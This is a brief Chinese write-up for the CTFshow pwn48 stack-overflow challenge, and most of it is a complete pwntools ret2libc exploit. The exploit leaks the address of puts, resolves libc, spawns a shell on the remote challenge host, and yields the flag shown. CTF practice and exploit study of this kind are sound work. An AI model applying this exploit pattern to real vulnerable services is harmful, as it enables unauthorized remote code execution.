CTFshow-PWN-栈溢出（pwn48）

32 位程序

无 system 无 /bin/sh

主函数 

存在栈溢出

打 ret2libc

利用 puts 函数泄露真实地址

没什么说的，直接写 exp 吧

# @author：My6n
# @time：20250609
from pwn import *
from LibcSearcher import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28301)
elf = ELF('./pwn')

offset = 0x6b+4
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
ctfshow_addr = elf.symbols['ctfshow']

payload1 = flat(cyclic(offset),puts_plt_addr,ctfshow_addr,puts_got_addr)

io.sendlineafter('O.o?\n',payload1)

puts_addr = u32(io.recv()[:4])

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')

payload2 = cyclic(offset) + p32(system_addr) + p32(1) + p32(bin_sh_addr)

io.sendline(payload2)

io.interactive()

拿到 flag：ctfshow{2ee388a2-d14f-42c1-9e67-1b45838f7238}